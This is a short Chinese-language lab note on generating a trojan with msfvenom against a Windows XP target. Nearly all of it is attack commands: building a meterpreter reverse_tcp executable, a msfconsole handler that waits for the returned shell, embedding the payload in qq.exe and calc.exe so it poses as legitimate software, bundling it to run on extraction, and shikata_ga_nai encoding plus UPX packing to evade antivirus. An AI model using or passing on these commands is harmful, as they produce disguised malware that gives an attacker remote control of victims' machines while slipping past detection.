msfvenom木马生成
实验环境:
kali、winxp
生成木马文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -f exe > a.exe
打开msfconsole,等待文件执行弹回shell
use exploit/multi/hander set PAYLOAD windows/meterpreter/reverse_tcp show options set lhost ip set lport x exploit
文件隐藏处理
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -x qq.exe -k -f exe -o qq.exe
文件隐藏处理还可以和其他文件打包一起,解压文件时自动执行木马程序
文件免杀加壳处理
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -x calc.exe lhost=ip lport=4444 -f exe -o calc2.exe
upx -5 qq.exe